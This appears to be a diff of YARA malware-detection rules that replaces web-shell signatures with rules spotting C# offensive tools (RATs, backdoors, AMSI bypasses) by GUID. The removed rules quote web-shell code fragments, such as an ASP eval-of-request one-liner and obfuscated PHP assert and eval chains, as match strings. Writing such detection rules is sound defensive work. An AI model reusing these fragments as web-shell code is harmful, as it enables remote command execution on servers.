-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L565-L580"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "b98495fb-0338-5042-a7ce-d117204eb91e"
+		date = "2020-12-13"
+		modified = "2025-08-15"
+		reference = "https://github.com/mrjamiebowman/Offensive-.NET"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L1787-L1800"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "76117b2ee4a7ac06832d50b2d04070b8"
-		logic_hash = "868b1b69fab3ec6fcfa15557075f313f4af0ec9cd15f41bb9dcc9bc26fc17f93"
-		score = 70
+		logic_hash = "dddbee2e6d1cd4046f91192fe26841cc6c359dd9188d472c8b2acca691c15a34"
+		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s2 = "<input name=\"nounce\" type=\"hidden\" value=\"<?php echo $_SESSION['nounce'];"
-		$s5 = "<p>Username: <input name=\"username\" type=\"text\" value=\"<?php echo $userna"
-		$s7 = "$_SESSION['output'] .= \"cd: could not change to: $new_dir\\n\";" fullword
+		$typelibguid0lo = "11fe5fae-b7c1-484a-b162-d5578a802c9c" ascii wide
 
 	condition:
-		2 of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_Webshell_Jsp_Hsxa
+rule SIGNATURE_BASE_HKTL_NET_GUID_Ruralbishop : FILE
 {
 	meta:
-		description = "Web Shell - file hsxa.jsp"
-		author = "Florian Roth (Nextron Systems)"
-		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
-		date = "2014-01-28"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L581-L594"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "8fd89465-1ecc-5eda-b2ab-273172ad945d"
+		date = "2020-12-13"
+		modified = "2025-08-15"
+		reference = "https://github.com/rasta-mouse/RuralBishop"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L1802-L1815"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "d0e05f9c9b8e0b3fa11f57d9ab800380"
-		logic_hash = "7f79b66d87f638bc09ee576de4dc4a8c5b1da7c406d318eeff7a4221c35d2313"
-		score = 70
+		logic_hash = "8dfa8652507851305da814b1410a7854be2c1c78cac325881118829be3456776"
+		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "<%@ page language=\"java\" pageEncoding=\"gbk\"%><jsp:directive.page import=\"ja"
+		$typelibguid0lo = "fe4414d9-1d7e-4eeb-b781-d278fe7a5619" ascii wide
 
 	condition:
-		all of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_Webshell_Jsp_Utils
+rule SIGNATURE_BASE_HKTL_NET_GUID_Deviceguardbypasses : FILE
 {
 	meta:
-		description = "Web Shell - file utils.jsp"
-		author = "Florian Roth (Nextron Systems)"
-		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
-		date = "2014-01-28"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L595-L609"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "3790faac-b5be-5999-b35f-71a2ef02b6ed"
+		date = "2020-12-13"
+		modified = "2025-08-15"
+		reference = "https://github.com/tyranid/DeviceGuardBypasses"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L1817-L1835"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "9827ba2e8329075358b8e8a53e20d545"
-		logic_hash = "90a5b64e59306bdffc5a89f5d86a2dc7a17669021d863e2a5ecea13d65c19053"
-		score = 70
+		logic_hash = "aff1a0236c532d5822a440f1d9a0a0265b422ebe0b53d799d53e838aef5f64ad"
+		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "ResultSet r = c.getMetaData().getTables(null, null, \"%\", t);" fullword
-		$s4 = "String cs = request.getParameter(\"z0\")==null?\"gbk\": request.getParameter(\"z"
+		$typelibguid0lo = "f318466d-d310-49ad-a967-67efbba29898" ascii wide
+		$typelibguid1lo = "3705800f-1424-465b-937d-586e3a622a4f" ascii wide
+		$typelibguid2lo = "256607c2-4126-4272-a2fa-a1ffc0a734f0" ascii wide
+		$typelibguid3lo = "4e6ceea1-f266-401c-b832-f91432d46f42" ascii wide
+		$typelibguid4lo = "1e6e9b03-dd5f-4047-b386-af7a7904f884" ascii wide
+		$typelibguid5lo = "d85e3601-0421-4efa-a479-f3370c0498fd" ascii wide
 
 	condition:
-		all of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_Webshell_Asp_01
+rule SIGNATURE_BASE_HKTL_NET_GUID_AMSI_Handler : FILE
 {
 	meta:
-		description = "Web Shell - file 01.asp"
-		author = "Florian Roth (Nextron Systems)"
-		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
-		date = "2014-01-28"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L610-L623"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "40768acf-fa9e-531a-83fd-187814ddc2d4"
+		date = "2020-12-13"
+		modified = "2025-08-15"
+		reference = "https://github.com/two06/AMSI_Handler"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L1837-L1853"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "61a687b0bea0ef97224c7bd2df118b87"
-		logic_hash = "e057800013a9a8f4c3ecbe4e27c14e904700548e6ad9dc1f00313c7a3de7fd2d"
-		score = 50
+		logic_hash = "3b27157331b3b9f6897134172f7dd9198fad7747c12d1020cb3e2d924c2910ce"
+		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "<%eval request(\"pass\")%>" fullword
+		$typelibguid0lo = "d829426c-986c-40a4-8ee2-58d14e090ef2" ascii wide
+		$typelibguid1lo = "86652418-5605-43fd-98b5-859828b072be" ascii wide
+		$typelibguid2lo = "1043649f-18e1-41c4-ae8d-ac4d9a86c2fc" ascii wide
+		$typelibguid3lo = "1d920b03-c537-4659-9a8c-09fb1d615e98" ascii wide
 
 	condition:
-		all of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_Webshell_Asp_404
+rule SIGNATURE_BASE_HKTL_NET_GUID_RAT_Telegramspybot : FILE
 {
 	meta:
-		description = "Web Shell - file 404.asp"
-		author = "Florian Roth (Nextron Systems)"
-		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
-		date = "2014-01-28"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L624-L637"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "57d22201-a051-5040-927c-30da3fc684fd"
+		date = "2020-12-13"
+		modified = "2025-08-15"
+		reference = "https://github.com/SebastianEPH/RAT.TelegramSpyBot"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L1855-L1868"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "d9fa1e8513dbf59fa5d130f389032a2d"
-		logic_hash = "3db951af36ed3d08bc10b4c3fc2e67481f005580fb76f66b6ec5789ed6e2efdb"
-		score = 70
+		logic_hash = "9fc671ef600548d962a2d5ab12ba3111ed19e83ef96d2d536eb343bb8fb4b0d2"
+		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "lFyw6pd^DKV^4CDRWmmnO1GVKDl:y& f+2"
+		$typelibguid0lo = "8653fa88-9655-440e-b534-26c3c760a0d3" ascii wide
 
 	condition:
-		all of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_Webshell_Webshell_Cnseay02_1
+rule SIGNATURE_BASE_HKTL_NET_GUID_Thehacktoolboxteek : FILE
 {
 	meta:
-		description = "Web Shell - file webshell-cnseay02-1.php"
-		author = "Florian Roth (Nextron Systems)"
-		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
-		date = "2014-01-28"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L638-L651"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "ad8cf2c8-f70e-5f46-92fa-46e1fa5e683c"
+		date = "2020-12-13"
+		modified = "2025-08-15"
+		reference = "https://github.com/teeknofil/TheHackToolBoxTeek"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L1870-L1889"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "95fc76081a42c4f26912826cb1bd24b1"
-		logic_hash = "9950fb7c26dfb25665093dbcf5c4a9dcf65466783509a3caa11c2c96d177d855"
-		score = 70
+		logic_hash = "f18d6be2789371f3db649d0df3fc31a2e97604b399873c9843c1e08c981be0da"
+		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "(93).$_uU(41).$_uU(59);$_fF=$_uU(99).$_uU(114).$_uU(101).$_uU(97).$_uU(116).$_uU"
+		$typelibguid0lo = "2aa8c254-b3b3-469c-b0c9-dcbe1dd101c0" ascii wide
+		$typelibguid1lo = "afeff505-14c1-4ecf-b714-abac4fbd48e7" ascii wide
+		$typelibguid2lo = "4cf42167-a5cf-4b2d-85b4-8e764c08d6b3" ascii wide
+		$typelibguid3lo = "118a90b7-598a-4cfc-859e-8013c8b9339c" ascii wide
+		$typelibguid4lo = "3075dd9a-4283-4d38-a25e-9f9845e5adcb" ascii wide
+		$typelibguid5lo = "295655e8-2348-4700-9ebc-aa57df54887e" ascii wide
+		$typelibguid6lo = "74efe601-9a93-46c3-932e-b80ab6570e42" ascii wide
 
 	condition:
-		all of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_Webshell_Php_Fbi
+rule SIGNATURE_BASE_HKTL_NET_GUID_Usbtrojan : FILE
 {
 	meta:
-		description = "Web Shell - file fbi.php"
-		author = "Florian Roth (Nextron Systems)"
-		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
-		date = "2014-01-28"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L652-L665"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "d25c9033-13e8-5fc9-8561-f8862cca39b8"
+		date = "2020-12-13"
+		modified = "2025-08-15"
+		reference = "https://github.com/mashed-potatoes/USBTrojan"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L1891-L1904"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "1fb32f8e58c8deb168c06297a04a21f1"
-		logic_hash = "de8584ae83ee3e23f4ce00ccd73f75b4568d6a4544af45b83784a9a0c34d42e3"
-		score = 70
+		logic_hash = "2280803c42311b8b78a51f0917d9fb4cdd8ca427ce2361372914e5922a1a0b68"
+		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s7 = "erde types','Getallen','Datum en tijd','Tekst','Binaire gegevens','Netwerk','Geo"
+		$typelibguid0lo = "4eee900e-adc5-46a7-8d7d-873fd6aea83e" ascii wide
 
 	condition:
-		all of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_Webshell_B374Kphp_B374K
+rule SIGNATURE_BASE_HKTL_NET_GUID_IIS_Backdoor : FILE
 {
 	meta:
-		description = "Web Shell - file B374k.php"
-		author = "Florian Roth (Nextron Systems)"
-		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
-		date = "2014-01-28"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L666-L682"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "44264dd9-f8e9-5a60-847f-94378e07a327"
+		date = "2020-12-13"
+		modified = "2025-08-15"
+		reference = "https://github.com/WBGlIl/IIS_backdoor"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L1906-L1920"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "bed7388976f8f1d90422e8795dff1ea6"
-		logic_hash = "1f0fc5e309dd67a11d6ba9b698fd9ca3c7e6616545c220de79aaa3b63f0ad931"
-		score = 70
+		logic_hash = "61fcba7e59ac005db140d8eee1d8a1fd4ce8cd18c069053270e0195ee9d63ccc"
+		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "Http://code.google.com/p/b374k-shell" fullword
-		$s1 = "$_=str_rot13('tm'.'vas'.'yngr');$_=str_rot13(strrev('rqb'.'prq'.'_'.'46r'.'fno'"
-		$s3 = "Jayalah Indonesiaku & Lyke @ 2013" fullword
-		$s4 = "B374k Vip In Beautify Just For Self" fullword
+		$typelibguid0lo = "3fda4aa9-6fc1-473f-9048-7edc058c4f65" ascii wide
+		$typelibguid1lo = "73ca4159-5d13-4a27-8965-d50c41ab203c" ascii wide
 
 	condition:
-		1 of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_Webshell_Cmd_Asp_5_1
+rule SIGNATURE_BASE_HKTL_NET_GUID_Shellgen : FILE
 {
 	meta:
-		description = "Web Shell - file cmd-asp-5.1.asp"
-		author = "Florian Roth (Nextron Systems)"
-		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
-		date = "2014-01-28"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L683-L696"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "538a4f12-5020-5c76-9208-363f435ed9a9"
+		date = "2020-12-13"
+		modified = "2025-08-15"
+		reference = "https://github.com/jasondrawdy/ShellGen"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L1922-L1935"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "8baa99666bf3734cbdfdd10088e0cd9f"
-		logic_hash = "1ff4ae8c08cec4605594e97d6c077d4808d3a73c04ddf6a51952252dd2d01cf4"
-		score = 70
+		logic_hash = "80c7291653e6cb5d7ef4d69390f7508cd95149d92b59aa3b5c8e6e0fe3723bfe"
+		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s9 = "Call oS.Run(\"win.com cmd.exe /c \"\"\" & szCMD & \" > \" & szTF &" fullword
+		$typelibguid0lo = "c6894882-d29d-4ae1-aeb7-7d0a9b915013" ascii wide
 
 	condition:
-		all of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_Webshell_Php_Dodo_Zip
+rule SIGNATURE_BASE_HKTL_NET_GUID_Mass_RAT : FILE
 {
 	meta:
-		description = "Web Shell - file zip.php"
-		author = "Florian Roth (Nextron Systems)"
-		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
-		date = "2014-01-28"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L697-L711"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "90b742da-6fd7-5c72-96cf-7a37a3e5d808"
+		date = "2020-12-13"
+		modified = "2025-08-15"
+		reference = "https://github.com/NYAN-x-CAT/Mass-RAT"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L1937-L1952"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "b7800364374077ce8864796240162ad5"
-		logic_hash = "bdeffafdedeadaba36c5c67f981c42d6111b954622780b930e9eeb9956c638b5"
-		score = 70
+		logic_hash = "53ef9b1d44e6497bafe0982f2e6be65240fcf5684a7b5a6c32a704ab3b7e085c"
+		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "$hexdtime = '\\x' . $dtime[6] . $dtime[7] . '\\x' . $dtime[4] . $dtime[5] . '\\x"
-		$s3 = "$datastr = \"\\x50\\x4b\\x03\\x04\\x0a\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00"
+		$typelibguid0lo = "6c43a753-9565-48b2-a372-4210bb1e0d75" ascii wide
+		$typelibguid1lo = "92ba2a7e-c198-4d43-929e-1cfe54b64d95" ascii wide
+		$typelibguid2lo = "4cb9bbee-fb92-44fa-a427-b7245befc2f3" ascii wide
 
 	condition:
-		all of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_Webshell_Azrailphp_V1_0
+rule SIGNATURE_BASE_HKTL_NET_GUID_Browser_Externalc2 : FILE
 {
 	meta:
-		description = "Web Shell - file aZRaiLPhp v1.0.php"
-		author = "Florian Roth (Nextron Systems)"
-		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
-		date = "2014-01-28"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L712-L726"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "8c309522-90e7-5f5a-b456-3a472756d397"
+		date = "2020-12-13"
+		modified = "2025-08-15"
+		reference = "https://github.com/mdsecactivebreach/Browser-ExternalC2"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L1954-L1967"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "26b2d3943395682e36da06ed493a3715"
-		logic_hash = "d0ccf9e37e378db4523d7918b30cff358115e7a4c36fad55a75f3aff218563c6"
-		score = 70
+		logic_hash = "1a0027775fb2a06d01cfe30c85ce03e11cf43976abe9bf7b2c61895a55d26404"
+		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s5 = "echo \" <font color='#0000FF'>CHMODU \".substr(base_convert(@fileperms($"
-		$s7 = "echo \"<a href='./$this_file?op=efp&fname=$path/$file&dismi=$file&yol=$path'><fo"
+		$typelibguid0lo = "10a730cd-9517-42d5-b3e3-a2383515cca9" ascii wide
 
 	condition:
-		all of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_Webshell_Php_List
+rule SIGNATURE_BASE_HKTL_NET_GUID_Offensivepowershelltasking : FILE
 {
 	meta:
-		description = "Web Shell - file list.php"
-		author = "Florian Roth (Nextron Systems)"
-		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
-		date = "2014-01-28"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L727-L742"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "d221e24d-a2ef-51e2-95bf-4b91b438d9cf"
+		date = "2020-12-13"
+		modified = "2025-08-15"
+		reference = "https://github.com/leechristensen/OffensivePowerShellTasking"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L1969-L1983"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "922b128ddd90e1dc2f73088956c548ed"
-		logic_hash = "007f9307493bca71dcbdcf6ba6c45bf36899e8f636ccbd09c26453cb0aea0847"
-		score = 70
+		logic_hash = "21d7192eaefeeed030b1ef1be29b54c12826914dc6f0945789f3690a39bee217"
+		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "// list.php = Directory & File Listing" fullword
-		$s2 = "    echo \"( ) <a href=?file=\" . $fichero . \"/\" . $filename . \">\" . $filena"
-		$s9 = "// by: The Dark Raver" fullword
+		$typelibguid0lo = "d432c332-3b48-4d06-bedb-462e264e6688" ascii wide
+		$typelibguid1lo = "5796276f-1c7a-4d7b-a089-550a8c19d0e8" ascii wide
 
 	condition:
-		1 of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_Webshell_Ironshell
+rule SIGNATURE_BASE_HKTL_NET_GUID_Dohc2 : FILE
 {
 	meta:
-		description = "Web Shell - file ironshell.php"
-		author = "Florian Roth (Nextron Systems)"
-		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
-		date = "2014-01-28"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L743-L757"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "0bb38f10-ca5c-5c18-97c9-540b6367d150"
+		date = "2020-12-13"
+		modified = "2025-08-15"
+		reference = "https://github.com/SpiderLabs/DoHC2"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L1985-L1998"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "8bfa2eeb8a3ff6afc619258e39fded56"
-		logic_hash = "7e4916010a33383cfc3cbbcd5d575ac2f3a579220b66bd07e3121f3db30da66d"
-		score = 70
+		logic_hash = "1601c438c4359d3daa1b5b3cc36a82e049a5ed379ec7a52cdd4a9bca83518dd3"
+		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s4 = "print \"<form action=\\\"\".$me.\"?p=cmd&dir=\".realpath('.').\""
-		$s8 = "print \"<td id=f><a href=\\\"?p=rename&file=\".realpath($file).\"&di"
+		$typelibguid0lo = "9877a948-2142-4094-98de-e0fbb1bc4062" ascii wide
 
 	condition:
-		all of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_Webshell_Caidao_Shell_404
+rule SIGNATURE_BASE_HKTL_NET_GUID_Syscallpoc : FILE
 {
 	meta:
-		description = "Web Shell - file 404.php"
-		author = "Florian Roth (Nextron Systems)"
-		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
-		date = "2014-01-28"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L758-L771"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "1ed5e226-0dcd-5397-b5e8-41f8a14981a1"
+		date = "2020-12-13"
+		modified = "2025-08-15"
+		reference = "https://github.com/SolomonSklash/SyscallPOC"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L2000-L2014"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "ee94952dc53d9a29bdf4ece54c7a7aa7"
-		logic_hash = "0743d18bc5066c96cca8cc0883971d3bc876e6c2fbb996e55b6930c715e07395"
-		score = 70
+		logic_hash = "a12628052d5c1043b3aae0bedb62908a35cb27871e329f84b0fc22e29149f89e"
+		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "<?php $K=sTr_RepLaCe('`','','a`s`s`e`r`t');$M=$_POST[ice];IF($M==NuLl)HeaDeR('St"
+		$typelibguid0lo = "1e54637b-c887-42a9-af6a-b4bd4e28cda9" ascii wide
+		$typelibguid1lo = "198d5599-d9fc-4a74-87f4-5077318232ad" ascii wide
 
 	condition:
-		all of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_Webshell_ASP_Aspydrv
+rule SIGNATURE_BASE_HKTL_NET_GUID_Pen_Test_Tools : FILE
 {
 	meta:
-		description = "Web Shell - file aspydrv.asp"
-		author = "Florian Roth (Nextron Systems)"
-		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
-		date = "2014-01-28"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L772-L785"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "00fb98a9-e615-5fb6-a555-4326b93e2c24"
+		date = "2020-12-13"
+		modified = "2025-08-15"
